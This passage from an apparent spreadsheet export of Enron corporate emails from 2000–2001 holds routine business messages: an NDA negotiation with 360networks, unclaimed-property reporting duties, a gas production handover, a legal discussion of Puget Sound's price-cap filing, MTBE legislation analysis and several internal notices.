&gt;    Corporation are confidential and intended solely for the_x000D_
&gt;    use of the individual or entity to whom they are addressed._x000D_
&gt;    If you have received this email in error please notify the_x000D_
&gt;    sender._x000D_
&gt;    ******************************************************************_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; **********************************************************************_x000D_
&gt; This e-mail is the property of Enron Corp. and/or its relevant affiliate_x000D_
&gt; and may contain confidential and privileged material for the sole use of_x000D_
&gt; the intended recipient (s). Any review, use, distribution or disclosure by_x000D_
&gt; others is strictly prohibited. If you are not the intended recipient (or_x000D_
&gt; authorized to receive for the recipient), please contact the sender or_x000D_
&gt; reply to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
&gt; delete all copies of the message. This e-mail (and any attachments hereto)_x000D_
&gt; are not intended to be an offer (or an acceptance) and do not create or_x000D_
&gt; evidence a binding and enforceable contract between Enron Corp. (or any of_x000D_
&gt; its affiliates) and the intended recipient or any other party, and may not_x000D_
&gt; be relied on by anyone as the basis of a contract by estoppel or_x000D_
&gt; otherwise. Thank you._x000D_
&gt;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Tue, 17 Jul 2001 07:53:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'h..fletcher@enron.com', 'theresa.franklin@enron.com', 'lisa.kinsey@enron.com', 'kirk.lenart@enron.com', 'kelly.loocke@enron.com', 'jessica.white@enron.com', 'souad.mahmassani@enron.com', 'l..dinari@enron.com', 'lia.halstead@enron.com', 'scott.loving@enron.com', 'shannon.groenewold@enron.com', 's..olinger@enron.com', 'robert.ramirez@enron.com', 'daniel.lisk@enron.com', 'joann.collins@enron.com', 'kevin.brady@enron.com', 'suzanne.christiansen@enron.com', 'darren.espey@enron.com', 'tamara.carter@enron.com', 'dan.prudenti@enron.com', 'cora.pendergrass@enron.com', 'chris.ordway@enron.com', 'steve.gillespie@enron.com', 'l..schrab@enron.com', 'jeanne.wukasch@enron.com', 'daniel.haynes@enron.com', 'a..casas@enron.com', 'clarissa.garcia@enron.com', 'j..brewer@enron.com', 'jan.sutherland@enron.com', 'robert.allwein@enron.com', 'f..smith@enron.com', 'kevin.alvarado@enron.com', 'gerald.gilbert@enron.com', 'teresa.mcomber@enron.com', 'shanna.boudreaux@enron.com', 'ted.evans@enron.com', 'meredith.homco@enron.com', 'jesse.villarreal@enron.com', 't..muzzy@enron.com', 'victor.lamadrid@enron.com', 'natalie.baker@enron.com', 'jason.wolfe@enron.com', 'christina.sanchez@enron.com', 'lisa.trofholz@enron.com', 'hillary.mack@enron.com', 'p..adams@enron.com', 'tracy.wood@enron.com', 'margie.straight@enron.com', 'wes.dempsey@enron.com', 'trading &lt;.williams@enron.com&gt;', 'patti.sullivan@enron.com', 'shelly.mendel@enron.com', 'tammy.gilmore@enron.com'})</t>
  </si>
  <si>
    <t>FW: Disaster Preparedness survey - needed Monday afternoon</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 JUST A FRIENDLY REMINDER IF YOU HAVE NOT YET FILLED THIS OUT._x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 11:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Consolidated Canadian P&amp;L by Month</t>
  </si>
  <si>
    <t>Here is what we reported for consolidated Canada as of Nov. 17.   Listed _x000D_
amounts are in thousands._x000D_
_x000D_
Jun July Aug Sept Oct Nov  YTD_x000D_
274 -4,672 5,115 990 -2,517 -6,708  27,552_x000D_
_x000D_
I'm still working on the first half of the year._x000D_
_x000D_
Thanks,_x000D_
Robin</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 10:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: 360 Networks Enron Net Works NDA</t>
  </si>
  <si>
    <t xml:space="preserve">Tana -_x000D_
_x000D_
When you have a chance, we need to finalized the 360 NDA pursuant to the _x000D_
changes proposed by 360 and the change I proposed below._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
Mark_x000D_
Senior Counsel, ENA_x000D_
Phone:     713-345-8897_x000D_
Facsimile: 713-646-3940_x000D_
E-Mail:      Mark.Greenberg@enron.com_x000D_
----- Forwarded by Mark Greenberg/NA/Enron on 02/28/2001 06:17 PM -----_x000D_
_x000D_
	Jennifer Farac &lt;Jennifer.Farac@360.net&gt;_x000D_
	02/28/2001 06:10 PM_x000D_
		 _x000D_
		 To: "'Mark.Greenberg@enron.com'" &lt;Mark.Greenberg@enron.com&gt;, Jennifer Farac _x000D_
&lt;Jennifer.Farac@360.net&gt;_x000D_
		 cc: Peter.Feltman@enron.com, Tana.Jones@enron.com_x000D_
		 Subject: RE: 360 Networks Enron Net Works NDA_x000D_
_x000D_
Your change in paragraph 2 is acceptable.  Please forward the documents for_x000D_
execution as you have suggested._x000D_
_x000D_
Jennifer_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mark.Greenberg@enron.com [mailto:Mark.Greenberg@enron.com]_x000D_
Sent: Wednesday, February 28, 2001 3:30 PM_x000D_
To: Jennifer Farac_x000D_
Cc: Peter.Feltman@enron.com; Tana.Jones@enron.com_x000D_
Subject: Re: 360 Networks Enron Net Works NDA_x000D_
_x000D_
_x000D_
_x000D_
Jennifer -_x000D_
_x000D_
I sincerely apologize to you for my delay in responding.  I had honestly_x000D_
thought I had done so, but guess I was wrong._x000D_
_x000D_
I have reviewed the comments you made to the agreement and have the_x000D_
following comments:_x000D_
_x000D_
1.  Paragraph 1 - First insertion of "or those of its affiliates" - this is_x000D_
acceptable._x000D_
_x000D_
2.  Paragraph 2 - Second insertion of "or its affiliates" - Since the term_x000D_
"Company" is not a defined term and, as a defined term, is not used_x000D_
elsewhere in the agreement, I would proposed that the provision where this_x000D_
word appears be redrafted to state --_x000D_
_x000D_
"Without limiting the generality of the foregoing, each such Representative_x000D_
must be specifically informed that he/she can use the Confidential_x000D_
Information solely in his/her capacity as a Representative of the Protected_x000D_
Party."_x000D_
_x000D_
3.  Paragraph 10 - The change to this area for New York law is fine._x000D_
_x000D_
Presuming the change in Paragraph 2 is acceptable, I will have the final_x000D_
documents prepared, signed and forwarded for signature to your attention._x000D_
_x000D_
Mark_x000D_
Senior Counsel, ENA_x000D_
Phone:     713-345-8897_x000D_
Facsimile: 713-646-3940_x000D_
E-Mail:      Mark.Greenberg@enron.com_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
                    Jennifer Farac_x000D_
_x000D_
                    &lt;Jennifer.Fara        To:_x000D_
"'Mark.Greenberg@enron.com'"              _x000D_
                    c@360.net&gt;            &lt;Mark.Greenberg@enron.com&gt;_x000D_
_x000D_
                                          cc:     Vanessa Wittman_x000D_
&lt;vanessaw@360.net&gt;        _x000D_
                    02/08/2001            Subject:     360 Networks Enron_x000D_
Net Works NDA     _x000D_
                    01:52 PM_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark,_x000D_
_x000D_
I have reviewed your standard form NDA and have noted two minor comments_x000D_
thereon.  I have suggested the State of New York as a more neutral_x000D_
jurisdiction and one that is widely used in commerical transactions, rather_x000D_
than the State of Texas.  The other comments are self explanatory._x000D_
_x000D_
Please contact me should you have any concerns._x000D_
_x000D_
_x000D_
_x000D_
&gt;  &lt;&lt;360 Networks - Enron NDA.doc&gt;&gt;_x000D_
_x000D_
Jennifer Farac_x000D_
Legal Counsel_x000D_
360networks inc._x000D_
Direct: 604.648.7838_x000D_
Fax:    604.648.7747_x000D_
Email: jfarac@360.net_x000D_
_x000D_
NOTE:  This email message contains information that is confidential and may_x000D_
be privileged.  It is intended only for the addressee.  If you have_x000D_
received_x000D_
this email message in error, please email the sender by replying to it and_x000D_
then deleting it.  We appreciate your assistance in correcting this error._x000D_
_x000D_
_x000D_
(See attached file: 360 Networks - Enron NDA.doc)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 14:26:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'georgene.moore@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'thomas.moore@enron.com'})</t>
  </si>
  <si>
    <t>UNCLAIMED PROPERTY REPORTING - F. Y. I.</t>
  </si>
  <si>
    <t xml:space="preserve">Jerry, I received a copy of an email you addressed to Bill Brown regarding a conversation you had with Karen Choyce about who is responsible for Unclaimed Property Reporting to the States.  The Corporate Secretary Division centralized this function a few years ago and I am the person responsible for making sure that Enron Corp. and its subsidiaries stay in compliance._x000D_
_x000D_
I think Karen meant that it is the responsibility of each business unit to identify the unclaimed checks, move the funds to the Escheat Liability Account, communicate this information to the Corporate Secretary's Division, and reconcile the general ledger as it pertains to their business unit._x000D_
_x000D_
It is my responsibility to prepare the reports and remit the funds to the applicable state before the deadline.  Please forward any correspondence you receive from the States regarding this matter (including notices and forms) to my attention for further handling.  Thank you for your cooperation._x000D_
_x000D_
Georgene Moore_x000D_
Corporate Secretary Division_x000D_
Unclaimed Property Coordinator_x000D_
EB4922_x000D_
Office:  (713) 853-5455_x000D_
Fax:  (713) 646-4970_x000D_
email:  georgene.moore@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Confidentiality Notice_x000D_
_x000D_
The information contained in this email may be confidential and/or privileged.  This email is intended to be reviewed by the individual or organization named above.  If you are not the intended recipient, you are hereby notified that any review, dissemination or copying of this email or its attachments, if any, or the information contained herein is prohibited.  If you receive this email in error, please immediately notify the sender by return email and delete this email from your system.  Thank you._x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 05:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'andym@vlmk.com', 'mark.guzman@enron.com', 'ben.pacewic@phs.com', 'sharkb8@teleport.com', 'gregg@papamurphys.com', 'joev@ripcity.com', 'chartman@nbsrealtors.com', 'billc@rosequarter.com'})</t>
  </si>
  <si>
    <t>Monday 4-23 at the Lucky Lab. Brewing Co.</t>
  </si>
  <si>
    <t>Come one come all,  meet next Monday at the Lucky Labrador for a beverage.? _x000D_
Julie and I shall  be there at about 5:15pm, so come after work, when you can _x000D_
get there.? Ben,  let Eric know, will ya?? See y'all there, you square._x000D_
_x000D_
Marcus B. Jones_x000D_
MCA Architects,  P.C._x000D_
PH (503)226-0622_x000D_
FAX (503)226-0626_x000D_
30 NW 1st Ave._x000D_
Portland, OR  97209 _x000D_
?</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 08:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paul.leanza@enron.com'})</t>
  </si>
  <si>
    <t>Re: Local Production July 00</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Germany/HOU/ECT on 07/13/2000 03:58 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
hboyd@columbiaenergygroup.com on 07/13/2000 12:58:49 PM_x000D_
To: " - *Carol_A_Miller@dom.com" &lt;Carol_A_Miller@dom.com&gt;_x000D_
cc: " - *Destephanis, Kara" &lt;kdestep@columbiaenergygroup.com&gt;, " - *Kinney, _x000D_
Doug" &lt;dkinney@columbiaenergygroup.com&gt;, " - *chris.germany@enron.com" _x000D_
&lt;chris.germany@enron.com&gt; _x000D_
Subject: Re: Local Production July 00_x000D_
_x000D_
_x000D_
Hi Carol,_x000D_
_x000D_
Can you help me with the below information?  I am looking to turn over our_x000D_
local production.  After August we won't be in business anymore and this local_x000D_
production that is in our name is really Enron North America's local_x000D_
production.   I had suggested that Enron (Chris Germany) set up a local agg_x000D_
pool or if he was selling it to someone else to let me know so that we can _x000D_
turn_x000D_
this production over ASAP.   I am looking to write a letter to Peoples to give_x000D_
them formal intent and need to know if I need to include meter identification_x000D_
numbers in the letter (currently I do not know what these numbers are)._x000D_
_x000D_
I apologize for this being such a mess, but I have been trying to get this_x000D_
cleared up and seem to have no luck._x000D_
_x000D_
Thanks again for your help._x000D_
_x000D_
cc:_x000D_
Subject:  Local Production July 00_x000D_
_x000D_
_x000D_
_x000D_
Hi Karen,_x000D_
_x000D_
Please nominate a volume of 24,800 dth's for the month of July 00 for CES'_x000D_
local production._x000D_
_x000D_
Please let me know if you need something more from me.  I understand that_x000D_
Clinton Energy is setting up a pool and will soon be able to take over our_x000D_
local production.  I will be sending in a letter soon relinquishing the local_x000D_
production, is there a meter number or identification number that I will need_x000D_
to mention in the letter?_x000D_
_x000D_
Thanks,_x000D_
Heidi Boyd_x000D_
703-561-6496_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 07:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">If you have not responded to the invitation below, please do so by Noon on _x000D_
Tuesday, January 9, 2001 so that we have enough time to order lunch.  Thank _x000D_
you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Steve Van Hooser_x000D_
	Sent by: Pat Radford_x000D_
	01/05/2001 09:51 AM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT, Roger Balog/HOU/ECT, Peggy Banczak/HOU/ECT, _x000D_
Sandi M Braband/HOU/ECT, Teresa G Bushman/HOU/ECT, Bob Carter/HOU/ECT, _x000D_
Michelle Cash/HOU/ECT, Barton Clark/HOU/ECT, Harry M Collins/HOU/ECT, Mary _x000D_
Cook/HOU/ECT, Shonnie Daniel/HOU/ECT, Peter del Vecchio/HOU/ECT, Stacy E _x000D_
Dickson/HOU/ECT, Shawna Flynn/HOU/ECT, Barbara N Gray/HOU/ECT, Wayne _x000D_
Gresham/HOU/ECT, Mark E Haedicke/HOU/ECT, Jeffrey T Hodge/HOU/ECT, Dan J _x000D_
Hyvl/HOU/ECT, Anne C Koehler/HOU/ECT, Dan Lyons/HOU/ECT, Travis _x000D_
McCullough/HOU/ECT, Lisa Mellencamp/HOU/ECT, Janet H Moore/HOU/ECT, Janice R _x000D_
Moore/HOU/ECT, Julia Murray/HOU/ECT, Gerald Nemec/HOU/ECT, David _x000D_
Portz/HOU/ECT, Michael A Robison/HOU/ECT, Elizabeth Sager/HOU/ECT, Richard B _x000D_
Sanders/HOU/ECT, Lance Schuler-Legal/HOU/ECT, Sara Shackleton/HOU/ECT, Shari _x000D_
Stack/HOU/ECT, Carol St Clair/HOU/ECT, Lou Stoler/HOU/ECT, Mark _x000D_
Taylor/HOU/ECT, Sheila Tweed/HOU/ECT, Steve Van Hooser/HOU/ECT, Ann Elizabeth _x000D_
White/HOU/ECT, Stuart Zisman/HOU/ECT, Robert Bruce/NA/Enron, Eddy _x000D_
Daniels/NA/Enron, Angela Davis/NA/Enron, Robert H George/NA/Enron, James _x000D_
Grace/Corp/Enron, Mark Greenberg/NA/Enron, Brent Hendry/NA/Enron, Kay _x000D_
Mann/Corp/Enron, Cheryl Nelson/NA/Enron, Marcus Nettelton/NA/Enron, John _x000D_
Viverito/Corp/Enron, Andrew Edison/NA/Enron, Susan Bailey/HOU/ECT, Kimberlee _x000D_
A Bennick/HOU/ECT, Genia FitzGerald/HOU/ECT, Nony Flores/HOU/ECT, Linda R _x000D_
Guinn/HOU/ECT, Ed B Hearn III/HOU/ECT, Mary J Heinitz/HOU/ECT, Tana _x000D_
Jones/HOU/ECT, Deb Korkmas/HOU/ECT, Laurie Mayer/HOU/ECT, Mary Ogden/HOU/ECT, _x000D_
Debra Perlingiere/HOU/ECT, Robert Walker/HOU/ECT, Kay Young/HOU/ECT, Merrill _x000D_
W Haas/HOU/ECT, Eric Gillaspie/HOU/ECT, Samantha Boyd/NA/Enron, Kathleen _x000D_
Carnahan/NA/Enron, Diane Goode/NA/Enron, Matt Maxwell/Corp/Enron, Stephanie _x000D_
Panus/NA/Enron, Gail Brownfeld/ENRON_DEVELOPMENT, Michelle _x000D_
Blaine/ENRON_DEVELOPMENT, Daniel R Rogers/ENRON_DEVELOPMENT, Ned E _x000D_
Crady/ENRON_DEVELOPMENT, Nancy Corbet/ENRON_DEVELOPMENT, Coralina _x000D_
Rivera/ENRON_DEVELOPMENT, Martha Braddy/ENRON_DEVELOPMENT, Sarah _x000D_
MacDonald/ENRON_DEVELOPMENT, Larry Pardue/ENRON_DEVELOPMENT, Frank _x000D_
Sayre/ENRON_DEVELOPMENT, Francisco Pinto Leite/ENRON_DEVELOPMENT_x000D_
		 cc: Connie Castillo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Margaret _x000D_
Doucette/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Holly _x000D_
Keiser/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Joya Williams/HOU/ECT@ECT, _x000D_
Chaundra Woods/HOU/ECT@ECT, Kaye Ellis/HOU/ECT@ECT, Brenda _x000D_
Whitehead/HOU/ECT@ECT, Sheri L Cromwell/HOU/ECT@ECT, Twanda _x000D_
Sweet/HOU/ECT@ECT, Jenny Helton/HOU/ECT@ect, Becky Spencer/HOU/ECT@ECT, _x000D_
Janette Elbertson/HOU/ECT@ECT, Suzanne Adams/HOU/ECT@ECT, Linda J _x000D_
Simmons/HOU/ECT@ECT, Taffy Milligan/HOU/ECT@ECT, Legal Temp 1/HOU/ECT@ECT, _x000D_
Dina Snow/Corp/Enron@Enron, Carolyn George/Corp/Enron@ENRON, Legal Temp _x000D_
2/HOU/ECT@ECT_x000D_
		 Subject: Invitation to All EWS Attorneys and Paralegals_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
Everything About Enron's Insurance Programs_x000D_
_x000D_
That You Were Afraid To Ask_x000D_
_x000D_
(or Didn't  Know to Ask)_x000D_
_x000D_
Presented by_x000D_
David Marshall_x000D_
Enron Corporate Risk Management_x000D_
_x000D_
Thursday, January 11, 2001_x000D_
11:30 - 1:00_x000D_
_x000D_
The Houston Room_x000D_
601 Jefferson_x000D_
(We've reserved the Enron Shuttle to transport the "non-walkers")_x000D_
_x000D_
Lunch will be served.  Please RSVP to Pat Radford at 39282._x000D_
_x000D_
One of the goals of Jeff Hodge and Barbara Gray is to increase the level of _x000D_
departmental information sharing activities.  Since we are faced on a daily _x000D_
basis with insurance matters in contract drafting and client advising, the _x000D_
East/Upstream Origination and Trading Group felt it would be productive to _x000D_
have Enron's Corporate Risk Management Group give a presentation on current _x000D_
Enron Insurance Programs, policies and contractual risk allocation _x000D_
preferences.  It then occured to us that this subject might be of interest to _x000D_
all of the lawyers on the 38th floor.   Please join us next Thursday.   _x000D_
_x000D_
Sorry for the inconvenient location.  We'll make it worth your while with the _x000D_
quality of the food and the presentation._x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 09:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Puget Sound requests NW price caps</t>
  </si>
  <si>
    <t xml:space="preserve">I think this is a detrimental reliance case or fraud.  I want to be _x000D_
aggressive on this.  Richard, please let me know what theory is best.  Do we _x000D_
have counsel for Washington?_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
	Christian Yoder_x000D_
	10/27/2000 12:15 PM_x000D_
		 _x000D_
		 To: Elizabeth Sager/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Richard B _x000D_
Sanders/HOU/ECT@ECT, Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Puget Sound requests NW price caps_x000D_
_x000D_
In the days immediately before the application for a price cap, Puget came to _x000D_
us and asked us to enter into several put options.  We did so. I am advised _x000D_
by the traders that if this price cap were to actually be in effect,  our put _x000D_
option transactions would not make sense for us economically and we would _x000D_
never have entered into them had we known of their intention to make this _x000D_
filing.   I am under some pressure  to explain two things:  (i) whether the _x000D_
fact that they knew they were going to file for the cap when they did the _x000D_
options is some kind of fraud, and (ii) whether the WSPP Agreement or our _x000D_
ISDA swap agreements have any clauses in them to address this kind of _x000D_
thing,ie. is this some kind of "illegality" issue?  I am working on the _x000D_
second issue and have discussed it with Mark Taylor, but on the first issue, _x000D_
I need advice from Richard and anyone else who can help.----cgy _x000D_
---------------------- Forwarded by Christian Yoder/HOU/ECT on 10/27/2000 _x000D_
09:59 AM ---------------------------_x000D_
_x000D_
_x000D_
Mary Hain_x000D_
10/27/2000 09:50 AM_x000D_
To: James D Steffes/NA/Enron@Enron, Marcie Milner, Joe Hartsoe@Enron, Sarah _x000D_
Novosel/Corp/Enron@ENRON, Richard Sanders, Christian Yoder/HOU/ECT@ECT, _x000D_
Portland West Desk_x000D_
cc:  _x000D_
Subject: Puget Sound requests NW price caps_x000D_
_x000D_
Puget Sound has filed a complaint against all jurisdictional sellers of _x000D_
wholesale energy and/or capacity in the Pacific Northwest, including parties _x000D_
to WSPP agreement.  Puget Sound requests FERC to impose price cap on _x000D_
wholesale sales of energy and capacity in the Pacific Northwest equal to the _x000D_
lowest price cap "established, ordered, or permitted by the Commission for _x000D_
wholesale purchases by the Cal ISO or Cal PX . . . ."  Puget requests an _x000D_
effective date of December 25,2000.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 04:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Deamed Credit Worksheet: Preston Exploration, LP</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all,_x000D_
_x000D_
Here is a credit worksheet for a deamed ISDA that Mary and I were pondering _x000D_
over this morning.  Please copy me on any distributions that become of this._x000D_
_x000D_
Thanks_x000D_
Brant_x000D_
</t>
  </si>
  <si>
    <t>NOTE:  YOU WILL RECEIVE THIS MESSAGE EACH TIME YOU ARE SELECTED AS A REVIEWER._x000D_
_x000D_
You have been selected to participate in the Year End 2000 Performance _x000D_
Management process by providing meaningful feedback on specific employee(s).  _x000D_
Your feedback plays an important role in the process, and your participation _x000D_
is critical to the success of Enron's Performance Management goals._x000D_
_x000D_
To complete requests for feedback, access PEP at http://pep.corp.enron.com _x000D_
and select Perform Review under Performance Review Services.  You may begin _x000D_
providing feedback immediately and are requested to have all feedback forms _x000D_
completed by Friday, November 17, 2000._x000D_
_x000D_
If you have any questions regarding PEP or your responsibility in the _x000D_
process, please contact the PEP Help Desk at:_x000D_
_x000D_
Houston: 1.713.853.4777, Option 4_x000D_
London:  44.207.783.4040, Option 4_x000D_
Email: perfmgmt@enron.com_x000D_
_x000D_
Thank you for your participation in this important process._x000D_
_x000D_
The following is a CUMULATIVE list of employee feedback requests with a _x000D_
status of "OPEN."   Once you have submitted or declined an employee's request _x000D_
for feedback, their name will no longer appear on this list._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Review Group: ENRON_x000D_
Feedback Due Date: Nov 17, 2000_x000D_
_x000D_
Employee Name                   Supervisor Name                 Date Selected_x000D_
-------------                   ---------------                 -------------_x000D_
CRENSHAW, SHIRLEY J             WINCENTY J KAMINSKI             Oct 26, 2000_x000D_
KINDALL, KEVIN                  VASANT SHANBHOGUE               Oct 30, 2000_x000D_
LAMAS VIEIRA PINTO, RODRIGO     DAVID PORT                      Oct 31, 2000_x000D_
SUPATGIAT, CHONAWEE             PEYTON S GIBNER                 Oct 27, 2000_x000D_
TAMARCHENKO, TANYA V            VASANT SHANBHOGUE               Oct 26, 2000_x000D_
VILLARREAL, NORMA E             SHEILA H WALTON                 Oct 26, 2000_x000D_
WALTON, SHEILA H                DAVID OXLEY                     Oct 27, 2000_x000D_
YAMAN, SEVIL                    VASANT SHANBHOGUE               Oct 27, 2000_x000D_
YUAN, DING                      RICHARD L CARSON                Oct 31, 2000</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 05:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brent.price@enron.com', 'larry.lawyer@enron.com', 'jeffrey.shankman@enron.com', 'john.nowlan@enron.com'})</t>
  </si>
  <si>
    <t>MTBE legislation</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 05/29/2001 _x000D_
12:38 PM ---------------------------_x000D_
_x000D_
_x000D_
Stanley Horton@ENRON_x000D_
05/24/2001 03:38 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc: Jeffrey A Shankman/HOU/ECT _x000D_
Subject: MTBE legislation_x000D_
_x000D_
I just wanted to make sure you guys know everything I do.  Actually this is _x000D_
somewhat bullish considering past legislative attempts._x000D_
---------------------- Forwarded by Stanley Horton/Corp/Enron on 05/24/2001 _x000D_
03:25 PM ---------------------------_x000D_
_x000D_
_x000D_
Jeffrey Keeler_x000D_
05/24/2001 12:52 PM_x000D_
To: Stanley Horton/Corp/Enron@Enron, James Prentice/Enron@EnronXGate, Michael _x000D_
Terraso/OTS/Enron@ENRON, Steven J Kean/NA/Enron@Enron, Richard _x000D_
Shapiro/NA/Enron@Enron, Linda Robertson/NA/Enron@ENRON, &lt;Pat _x000D_
Shortridge@erols.com&gt;, Joe Hartsoe/Corp/Enron@ENRON, Marc _x000D_
Phillips/OTS/Enron@ENRON, Jim Peterson/OTS/Enron@ENRON, Adam _x000D_
Pollock/ENRON@enronXgate, Lisa Yoho/NA/Enron@Enron, Chris _x000D_
Long/Corp/Enron@ENRON, Lisa Jacobson/ENRON@enronXgate_x000D_
cc:  _x000D_
_x000D_
Subject: MTBE legislation_x000D_
_x000D_
Today, Senators Bob Smith (R-NH) and Harry Reid (D-NV) will introduce an MTBE _x000D_
bill. which is expected to be slightly different than we've seen in previous _x000D_
Congresses.  _x000D_
_x000D_
We expect it to include:  _x000D_
_x000D_
1) a 4-year date certain to eliminate MTBE, with EPA determining the phaseout _x000D_
schedule_x000D_
2)  a lifting of the 2% oxygenate standard upon perfunctory petition by State _x000D_
governors within 90 days from date of enactment_x000D_
3)  and environmental "anti-backsliding" provision focused only on air-toxics _x000D_
and using a 2000 baseline with a 27.5% percent standard (the way I understand _x000D_
it right now, RFG must perform 27.5% better than 2000 baseline for _x000D_
conventional gasoline)_x000D_
4) provisions for MTBE producer "transition assistance"_x000D_
_x000D_
Brief analysis:  _x000D_
_x000D_
We'll have more details shortly, but the bill looks a little better than _x000D_
previous efforts.  A number of bills have been introduced this Congress, but _x000D_
this will probably be the leading effort.  _x000D_
_x000D_
As you know, Enron has led efforts to include the "transition assistance" _x000D_
piece -- which is still largely undefined in the legislation -- but we are _x000D_
pleased with the inclusion of a "placeholder" while the Senate decides on the _x000D_
best approach.  We will continue to lead the development of such incentives _x000D_
(which will likely take the form of EPA/DOE funding for MTBE producers who _x000D_
convert plants to produce iso-octane or alkylate)._x000D_
_x000D_
An MTBE ban is of course not good, but a "date certain" gives producers more _x000D_
flexibility to determine their options rather than reduce production under _x000D_
several steps of a phase out.   Allowing states to get a waiver of the oxy _x000D_
standard is probably a given in any legislation, but will face some _x000D_
opposition from the ethanol community -- who just want a simple MTBE ban._x000D_
_x000D_
The anti-backsliding provision is still being refined, but looks fairly _x000D_
lame.  We need more details to make an accurate assessment, but its likely _x000D_
that environmental groups will want a bit more._x000D_
_x000D_
One political factor -- with Sen. Jim Jeffords leaving the Republican party, _x000D_
Democrats will be given control of the Senate Environment Committee, which _x000D_
will consider this bill.  They will likely allow Jeffords to chair the _x000D_
committee.  The significance is that Sen. Bob Smith (R-NH) is the current _x000D_
chair, and has been able to use that position to drive his past bills on MTBE _x000D_
-- in losing the chairmanship, his legislation may face a longer road through _x000D_
Committee._x000D_
_x000D_
I will keep you posted as the legislation evolves._x000D_
_x000D_
Jeffrey Keeler_x000D_
Director, Environmental Strategies_x000D_
Enron_x000D_
Washington DC office - (202) 466-9157_x000D_
Cell Phone (203) 464-1541_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 04:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Plays</t>
  </si>
  <si>
    <t xml:space="preserve">Updated plays.  I have copied both sheets on 1 page (front and back)._x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Oct 2000 08:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Forward oil prices</t>
  </si>
  <si>
    <t xml:space="preserve">Stinson,_x000D_
_x000D_
It should be in the attached message._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stinson Gibner_x000D_
10/30/2000 04:29 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Forward oil prices  _x000D_
_x000D_
I can find someone or else do it myself.    Can you specify the historical _x000D_
period and also how far out the curve we are providing?_x000D_
_x000D_
Is it just WTI?_x000D_
_x000D_
--Stinson_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 09:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>missing deal_x000D_
_x000D_
selling morgan stanley_x000D_
127.00_x000D_
25 mw_x000D_
sp15_x000D_
26th_x000D_
off peak_x000D_
chris</t>
  </si>
  <si>
    <t>Thu, 27 Jul 2000 00:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;CALPINE DAILY GAS NOMINATION 1.doc&gt;&gt;_x000D_
_x000D_
RICKY A. ARCHER_x000D_
Fuel Supply_x000D_
700 Louisiana, Suite 2700_x000D_
Houston, Texas 77002_x000D_
713-830-8659 direct_x000D_
713-830-8722 fax_x000D_
_x000D_
_x000D_
 - CALPINE DAILY GAS NOMINATION 1.doc</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 07:38:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'loretta.brooks@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'anthony.dayao@enron.com', 'rogers.herndon@enron.com', 'tim.belden@enron.com', 'don.black@enron.com', 'm..presto@enron.com', 'jeff.richter@enron.com'})</t>
  </si>
  <si>
    <t>FW: EES Power Weekly Mtg.</t>
  </si>
  <si>
